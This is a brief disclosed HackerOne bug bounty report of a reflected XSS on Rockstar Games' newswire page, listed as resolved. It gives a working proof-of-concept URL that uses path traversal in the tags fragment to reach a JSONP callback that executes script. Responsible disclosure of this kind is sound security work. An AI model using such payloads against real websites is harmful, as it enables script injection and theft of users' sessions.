Reflected XSS via #tags= while using a callback in newswire http://www.rockstargames.com/newswire

Disclosed: 2017-03-16 22:23:53 By nahamsec To rockstargames

Medium

Vulnerability Details

Hello, Here's the link: http://www.rockstargames.com/newswire/tags#/?tags=../../comments_dal/users/getGlobalLoginSettings.json?callback=alert%28document.domain%29// Thanks, Ben

Actions

View on HackerOne

Report Stats

Report ID: 153618
State: Closed
Substate: resolved
Upvotes: 26

Reflected XSS via #tags= while using a callback in newswire http://www.rockstargames.com/newswire

Vulnerability Details

Actions

Report Stats

Share this report